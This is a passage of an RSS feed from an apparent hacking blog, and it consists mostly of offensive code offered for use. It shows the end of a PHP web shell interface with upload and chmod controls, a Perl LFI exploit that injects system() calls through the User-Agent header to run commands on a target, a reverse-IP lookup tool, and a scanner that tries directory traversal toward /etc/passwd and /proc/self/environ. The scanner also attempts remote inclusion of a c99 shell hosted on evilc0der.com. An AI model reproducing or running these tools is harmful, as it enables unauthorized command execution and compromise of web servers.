&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;Upload ---&amp;gt; &amp;nbsp;&lt;/td&gt;
&lt;td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;form action="'.$me.'" method=post enctype=multipart/form-data&gt;'.$nowaddress.'
&lt;font face="Tahoma" style="font-size: 10pt"&gt;&lt;input size=40 type=file name=filee &gt;
&lt;input type=submit value=Upload /&gt;&lt;br&gt;'.$ifupload.'&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;&lt;b&gt;'.$formp.'Chmod ----&amp;gt;&lt;/b&gt;&amp;nbsp;&amp;nbsp;File : &lt;/td&gt;
&lt;td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;&lt;form method=post action=/now2.php&gt;&lt;input size=55 name=chmode&gt;&amp;nbsp;&amp;nbsp;Permission : &lt;input name=chmodnum value=777 size=3&gt; &lt;input type=submit value=" Ok "&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;&lt;b&gt;'.$formp.'Create Dir ----&amp;gt;&lt;/b&gt; Dirctory Name &lt;/td&gt;
&lt;td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;
&lt;input name=cdirname size=20&gt;'.$nowaddress.' &lt;input type=submit value=" Create "&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;'.$formp.'&lt;b&gt;Create File ----&amp;gt;&lt;/b&gt; Name File &lt;/td&gt;
&lt;td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;&lt;input name=cfilename size=20&gt;'.$nowaddress.' &lt;input type=submit value=" Create "&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top"&gt;
&lt;font face="Tahoma" style="font-size: 10pt"&gt;'.$formp.'&lt;b&gt;Copy ----&amp;gt;&lt;/b&gt;&lt;/b&gt;&amp;nbsp;&amp;nbsp;File : &lt;/td&gt;
&lt;td width="750"&gt;&lt;font face="Tahoma" style="font-size: 10pt"&gt;
&lt;input size=40 name=copyname&gt; To Directory &lt;input size=40 name=cpyto&gt; &lt;input type=submit value =Copy&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;hr&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#c6c6c6"&gt;
&lt;p style="margin-top: 0pt; margin-bottom: 0pt" align="center"&gt;
&lt;span lang="en-us"&gt;&lt;font face="Tahoma" size="1"&gt;Coded by Amin Shokohi (Pejvak)&lt;br&gt;&lt;a href="http://www.itsecteam.com" target="_blank"&gt;&lt;font size=1&gt;iTSecTeam.com&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;';</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/208/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=208&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/17/mihlayici-2010-shell/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>Lfi Command Exploit</title>
		<link>http://elc3wad.wordpress.com/2012/01/16/lfi-command-exploit/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/16/lfi-command-exploit/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 14:31:26 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=206</guid>
		<description><![CDATA[#!/usr/bin/perl -w use strict; use LWP 5.64; use LWP::UserAgent; my $browser = LWP::UserAgent-&#62;new; my $url = $ARGV[0]; my ($line,$response); $url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ"; print "Perintah : "; while( $line = &#60;STDIN&#62;) { chop($line); $browser-&#62;agent("bash&#60;?system(\"$line 2&#62; /dev/stdout\");?&#62;bash"); $response = $browser-&#62;get( $url ); if ($response-&#62;content =~ /bash(.*)bash/s) { print $1; } print "Command: "; }<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=206&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span id="more-206"></span></p>
<pre>#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;
my $browser = LWP::UserAgent-&gt;new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";
print "Perintah : ";
while( $line = &lt;STDIN&gt;) {
         chop($line);
         $browser-&gt;agent("bash&lt;?system(\"$line 2&gt; /dev/stdout\");?&gt;bash");
         $response = $browser-&gt;get( $url );
         if ($response-&gt;content =~ /bash(.*)bash/s) {
                 print $1;
         }
         print "Command: ";
 }</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/206/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=206&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/16/lfi-command-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>Priv8 reverse İp Tool</title>
		<link>http://elc3wad.wordpress.com/2012/01/16/priv8-reverse-ip-tool/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/16/priv8-reverse-ip-tool/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 14:29:22 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[reverse İp Tool]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=203</guid>
		<description><![CDATA[&#60;form method=post action=&#8217;&#60;?php echo $_SERVER['PHP_SELF'] ?&#62;&#8217; &#62; Masukkan ipadress: &#60;input type=text size=20 value=&#8217;&#60;?php echo $_POST['ip'] ?&#62;&#8217; name=ip /&#62; &#60;input type=submit name=reverse value=&#8217;Revers It!&#8217; /&#62; &#60;/form&#62; &#60;?php if($_POST['reverse']): echo &#8221;Reversing IP: &#8221;.$_POST['ip'].&#8221;&#60;Br&#62;&#8221;; flush(); sleep(1); $host = &#8221;www.ip-adress.com&#8221;; $query = &#8221;/reverse_ip/&#8221;.$_POST['ip']; $sock = fsockopen($host,&#8221;80&#8243;,$errno,$errstr,30); if ($sock) { $get  = &#8221;GET &#8221;.$query.&#8221; HTTP/1.1\r\n&#8221;. &#8220;Host: &#8221;.$host.&#8221;\r\n&#8221;. &#8220;Accept: */*\r\n&#8221;. &#8220;User-Agent: HNFox/5.0\r\n&#8221;. &#8220;Connection: Close\r\n\r\n&#8221;; fputs($sock,$get); while (!feof($sock)) { $output .= trim(fgets($sock, 3600)).&#8221;\n&#8221;; } fclose($sock); } else{ echo &#8221;Failed! Gak bisa konek ke ip-adress.com!&#8221;; exit(); } $browsing = explode(&#8220;\n&#8221;,$output); $c = 1; foreach($browsing as $i =&#62; $v){ if(eregi(&#8216;id=&#8221;hostcount&#8221;&#8216;,$v)){ echo &#8221;Host Found: &#8221;.strip_tags($v).&#8221;&#60;Br&#62;&#8221;; } if(eregi(&#8216;class=&#8221;odd&#8221;&#8216;,$v) &#124;&#124; eregi(&#8216;class=&#8221;even&#8221;&#8216;,$v)){ $key = $i+3; echo $c.&#8221;. &#8221;.strip_tags($browsing[$key]).&#8221;&#60;Br&#62;&#8221;; $c++; } flush(); sleep(1); } echo &#8221;7Reversing Done!&#8221;; endif; exit(); ?&#62;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=203&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span id="more-203"></span>&lt;form method=post action=&#8217;&lt;?php echo $_SERVER['PHP_SELF'] ?&gt;&#8217; &gt;<br />
Masukkan ipadress: &lt;input type=text size=20 value=&#8217;&lt;?php echo $_POST['ip'] ?&gt;&#8217; name=ip /&gt;<br />
&lt;input type=submit name=reverse value=&#8217;Revers It!&#8217; /&gt;<br />
&lt;/form&gt;<br />
&lt;?php<br />
if($_POST['reverse']):</p>
<p>echo &#8221;Reversing IP: &#8221;.$_POST['ip'].&#8221;&lt;Br&gt;&#8221;;<br />
flush();<br />
sleep(1);</p>
<p>$host = &#8221;www.ip-adress.com&#8221;;<br />
$query = &#8221;/reverse_ip/&#8221;.$_POST['ip'];</p>
<p>$sock = fsockopen($host,&#8221;80&#8243;,$errno,$errstr,30);<br />
if ($sock) {<br />
$get  = &#8221;GET &#8221;.$query.&#8221; HTTP/1.1\r\n&#8221;.<br />
&#8220;Host: &#8221;.$host.&#8221;\r\n&#8221;.<br />
&#8220;Accept: */*\r\n&#8221;.<br />
&#8220;User-Agent: HNFox/5.0\r\n&#8221;.<br />
&#8220;Connection: Close\r\n\r\n&#8221;;<br />
fputs($sock,$get);<br />
while (!feof($sock)) {<br />
$output .= trim(fgets($sock, 3600)).&#8221;\n&#8221;;<br />
}<br />
fclose($sock);<br />
}<br />
else{<br />
echo &#8221;Failed! Gak bisa konek ke ip-adress.com!&#8221;;<br />
exit();<br />
}</p>
<p>$browsing = explode(&#8220;\n&#8221;,$output);<br />
$c = 1;<br />
foreach($browsing as $i =&gt; $v){<br />
if(eregi(&#8216;id=&#8221;hostcount&#8221;&#8216;,$v)){<br />
echo &#8221;Host Found: &#8221;.strip_tags($v).&#8221;&lt;Br&gt;&#8221;;<br />
}<br />
if(eregi(&#8216;class=&#8221;odd&#8221;&#8216;,$v) || eregi(&#8216;class=&#8221;even&#8221;&#8216;,$v)){<br />
$key = $i+3;<br />
echo $c.&#8221;. &#8221;.strip_tags($browsing[$key]).&#8221;&lt;Br&gt;&#8221;;<br />
$c++;<br />
}<br />
flush();<br />
sleep(1);<br />
}<br />
echo &#8221;7Reversing Done!&#8221;;</p>
<p>endif;</p>
<p>exit();</p>
<p>?&gt;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elc3wad.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elc3wad.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elc3wad.wordpress.com/203/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=203&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elc3wad.wordpress.com/2012/01/16/priv8-reverse-ip-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/44a3f6ca78997305202cb81731b61e9c?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rootcw</media:title>
		</media:content>
	</item>
		<item>
		<title>LFI, RFI, SQL &#8211; Scanner</title>
		<link>http://elc3wad.wordpress.com/2012/01/16/lfi-rfi-sql-scanner/</link>
		<comments>http://elc3wad.wordpress.com/2012/01/16/lfi-rfi-sql-scanner/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 12:22:04 +0000</pubDate>
		<dc:creator>eL-CeWaD</dc:creator>
				<category><![CDATA[Genel]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[SQL - Scanner]]></category>

		<guid isPermaLink="false">http://elc3wad.wordpress.com/?p=199</guid>
		<description><![CDATA[&#60;html&#62; &#60;head&#62;&#60;title&#62;izleyici LFI/RFI/SQL Scanner&#60;/title&#62;&#60;/head&#62; &#60;?php set_time_limit(0); if (isset($_GET["do"])) { $do = explode(&#8220;:&#8221;,$_GET["do"]); if ($do[0] == &#8221;selected&#8221;) {selected($do[1]); } elseif ($do[0] == &#8221;scantime&#8221;) { scantime($do[1]); } }   else { main(); } function main(){ echo &#8217;LFI, RFI, SQL - Scanner &#60;form action=&#8221;" method=&#8221;post&#8221;&#62; Site to test: &#60;input name=&#8221;scan&#8221; type=&#8221;text&#8221; /&#62; &#60;input type=&#8221;submit&#8221; name=&#8221;searchn&#8221; value=&#8221;Scan&#8221;/&#62; &#60;/form&#62;&#8217;; $link = $_POST['scan']; preg_match(&#8216;@^(?:http://)?([^/]+)@i&#8217;,$link, $matches); $host = $matches[1]; function getLinks($link) { $ret = array(); $dom = new domDocument; @$dom-&#62;loadHTML(file_get_contents($link)); $dom-&#62;preserveWhiteSpace = false; $links = $dom-&#62;getElementsByTagName(&#8216;a&#8217;); foreach ($links as $tag) { $ret[$tag-&#62;getAttribute('href')] = $tag-&#62;childNodes-&#62;item(0)-&#62;nodeValue; } return $ret; } if (isset($_POST["searchn"])) { echo &#8217;&#60;form action=&#8221;lfi.php?do=selected&#8221; method=&#8221;post&#8221;&#62;&#8217;; echo &#8221;&#60;br&#62;Links found: &#60;ol&#62;&#8221;; if (preg_match(&#8220;/=/&#8221;, $link)) { echo &#8217;&#60;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$link.&#8217;&#8221;&#62;&#8217;.$link.&#8217;&#60;br&#62;&#8217;; } $urls = getLinks($link); if(sizeof($urls) &#62; 0) { foreach($urls as $key=&#62;$value) { if (preg_match(&#8220;/=/i&#8221;, $key)) { if (preg_match(&#8220;/.com&#124;.net&#124;.org&#124;.co.uk&#124;.com.au&#124;.us/&#8221;, $key)) { echo &#8217;&#60;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$key.&#8217;&#8221;&#62;&#8217;.$key.&#8217;&#60;br&#62;&#8217;; } else{ echo &#8217;&#60;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$host.&#8217;/&#8217;.$key.&#8217;&#8221;&#62;&#8217;.$host.&#8217;/&#8217;.$key.&#8217;&#60;br&#62;&#8217;; } } } echo &#8221;&#60;/ol&#62;&#8221;; } else { echo &#8221;&#60;/ol&#62;&#8221;; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elc3wad.wordpress.com&amp;blog=30896651&amp;post=199&amp;subd=elc3wad&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span id="more-199"></span>&lt;html&gt;<br />
&lt;head&gt;&lt;title&gt;izleyici LFI/RFI/SQL Scanner&lt;/title&gt;&lt;/head&gt;<br />
&lt;?php<br />
set_time_limit(0);<br />
if (isset($_GET["do"])) {<br />
$do = explode(&#8220;:&#8221;,$_GET["do"]);<br />
if ($do[0] == &#8221;selected&#8221;) {selected($do[1]); }<br />
elseif ($do[0] == &#8221;scantime&#8221;) { scantime($do[1]); }</p>
<p>}   else { main(); }</p>
<p>function main(){<br />
echo &#8217;LFI, RFI, SQL - Scanner<br />
&lt;form action=&#8221;" method=&#8221;post&#8221;&gt;<br />
Site to test: &lt;input name=&#8221;scan&#8221; type=&#8221;text&#8221; /&gt;<br />
&lt;input type=&#8221;submit&#8221; name=&#8221;searchn&#8221; value=&#8221;Scan&#8221;/&gt;<br />
&lt;/form&gt;&#8217;;<br />
$link = $_POST['scan'];<br />
preg_match(&#8216;@^(?:http://)?([^/]+)@i&#8217;,$link, $matches);<br />
$host = $matches[1];</p>
<p>function getLinks($link) {<br />
$ret = array();<br />
$dom = new domDocument;<br />
@$dom-&gt;loadHTML(file_get_contents($link));<br />
$dom-&gt;preserveWhiteSpace = false;<br />
$links = $dom-&gt;getElementsByTagName(&#8216;a&#8217;);<br />
foreach ($links as $tag)<br />
{<br />
$ret[$tag-&gt;getAttribute('href')] = $tag-&gt;childNodes-&gt;item(0)-&gt;nodeValue;<br />
}<br />
return $ret;<br />
}<br />
if (isset($_POST["searchn"])) {<br />
echo &#8217;&lt;form action=&#8221;lfi.php?do=selected&#8221; method=&#8221;post&#8221;&gt;&#8217;;<br />
echo &#8221;&lt;br&gt;Links found: &lt;ol&gt;&#8221;;<br />
if (preg_match(&#8220;/=/&#8221;, $link)) {<br />
echo &#8217;&lt;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$link.&#8217;&#8221;&gt;&#8217;.$link.&#8217;&lt;br&gt;&#8217;;<br />
}<br />
$urls = getLinks($link);<br />
if(sizeof($urls) &gt; 0)<br />
{<br />
foreach($urls as $key=&gt;$value)<br />
{<br />
if (preg_match(&#8220;/=/i&#8221;, $key)) {<br />
if (preg_match(&#8220;/.com|.net|.org|.co.uk|.com.au|.us/&#8221;, $key)) {<br />
echo &#8217;&lt;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$key.&#8217;&#8221;&gt;&#8217;.$key.&#8217;&lt;br&gt;&#8217;;<br />
}<br />
else{<br />
echo &#8217;&lt;input name=&#8221;sites[]&#8220; type=&#8221;checkbox&#8221; id=&#8221;sites[]&#8220; value=&#8221;&#8216;.$host.&#8217;/&#8217;.$key.&#8217;&#8221;&gt;&#8217;.$host.&#8217;/&#8217;.$key.&#8217;&lt;br&gt;&#8217;;<br />
}<br />
}<br />
}<br />
echo &#8221;&lt;/ol&gt;&#8221;;<br />
}<br />
else<br />
{<br />
echo &#8221;&lt;/ol&gt;&#8221;;<br />
echo &#8221;No exploitable links found at $link&lt;br&gt;&lt;br&gt;&#8221;;<br />
}<br />
echo &#8221;&lt;input type=&#8217;submit&#8217; value=&#8217;Scan Sites&#8217;&gt;&lt;/form&gt;&#8221;;<br />
}<br />
}</p>
<p>function selected(){<br />
echo &#8217;&lt;form action=&#8221;lfi.php?do=scantime&#8221; method=&#8221;post&#8221;&gt;&#8217;;<br />
$sites = $_POST['sites'];<br />
$n = count($sites);<br />
$i = 0;<br />
$r = 1;<br />
echo &#8221;Testing..&#8221; .<br />
&#8220;&lt;ol&gt;&#8221;;<br />
while ($i &lt; $n)<br />
{<br />
$site = &#8221;{$sites[$i]}&#8221;;<br />
$equals = strrpos($site,&#8221;=&#8221;);<br />
$siteedit = substr_replace($site, &#8221;, $equals+1);<br />
echo &#8221;&lt;br /&gt;$r. $siteedit&lt;br /&gt;&#8221;;<br />
rfi($siteedit);<br />
lfi($siteedit);<br />
sql($siteedit);<br />
$i++;<br />
$r++;<br />
}<br />
echo &#8221;&lt;/ol&gt;&#8221;;<br />
echo &#8221;&lt;a href=&#8217;lfi.php&#8217;&gt;Test again&lt;/a&gt;&#8221;;<br />
}</p>
<p>function lfi($site) {<br />
$lfifound = 0;<br />
$lfi = array(<br />
&#8220;/etc/passwd&#8221;,<br />
&#8220;../etc/passwd&#8221;,<br />
&#8220;../../etc/passwd&#8221;,<br />
&#8220;../../../etc/passwd&#8221;,<br />
&#8220;../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;../../../../../../../../../../../../../../../etc/passwd&#8221;,<br />
&#8220;/etc/passwd%00&#8243;,<br />
&#8220;../etc/passwd%00&#8243;,<br />
&#8220;../../etc/passwd%00&#8243;,<br />
&#8220;../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../../../etc/passwd%00&#8243;,<br />
&#8220;/proc/self/environ&#8221;,<br />
&#8220;../proc/self/environ&#8221;,<br />
&#8220;../../proc/self/environ&#8221;,<br />
&#8220;../../../proc/self/environ&#8221;,<br />
&#8220;../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;/../../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;../../../../../../../../../../../../../../../proc/self/environ&#8221;,<br />
&#8220;/proc/self/environ%00&#8243;,<br />
&#8220;../proc/self/environ%00&#8243;,<br />
&#8220;../../proc/self/environ%00&#8243;,<br />
&#8220;../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;/../../../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../../proc/self/environ%00&#8243;,<br />
&#8220;../../../../../../../../../../../../../../../proc/self/environ%00&#8243;<br />
);</p>
<p>$totallfi = count($lfi);<br />
for($i=0; $i&lt;$totallfi; $i++)<br />
{<br />
$GET = @file_get_contents(&#8220;$site$lfi[$i]&#8220;);<br />
if (preg_match(&#8220;/root/i&#8221;,$GET, $matches))  {<br />
echo &#8221;LFI found: $site$lfi[$i]&lt;br&gt;&#8221;;<br />
$lfifound = 1;<br />
}<br />
}<br />
if ($lfifound == 0) {<br />
echo &#8221;No LFI found.&lt;br&gt;&#8221;;<br />
}<br />
}</p>
<p>function rfi($site) {<br />
$rfifound = 0;<br />
$rfi = &#8221;http://www.evilc0der.com/c99.txt?&#8221;;<br />
$GET1 = @file_get_contents(&#8220;$site$rfi&#8221;);<br />
if (preg_match(&#8220;/root/i&#8221;,$GET1, $matches))  {<br />
echo &#8221;RFI found: $site$rfi&lt;br&gt;&#8221;;<br />
$rfifound = 1;<br />
}<br />
if ($rfifound == 0) {<br />
echo &#8221;No RFI found.&lt;br&gt;&#8221;;<br />
}<br />
}</p>
<p>function sql($site) {<br />
$sqlfound = 0;<br />
$sql = &#8221;99&#8242;&#8221;;<br />
$GET2 = @file_get_contents(&#8220;$site$sql&#8221;);<br />
if (preg_match(&#8220;/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i&#8221;,$GET2, $matches))  {<br />
echo &#8221;SQL var: $site$sql&lt;br&gt;&#8221;;<br />
